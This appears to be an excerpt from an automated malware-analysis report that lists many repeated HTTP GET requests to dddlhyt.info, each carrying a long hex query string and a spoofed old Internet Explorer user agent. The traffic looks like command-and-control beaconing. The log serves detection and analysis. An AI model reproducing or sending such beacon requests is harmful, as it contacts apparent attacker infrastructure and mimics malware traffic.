        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
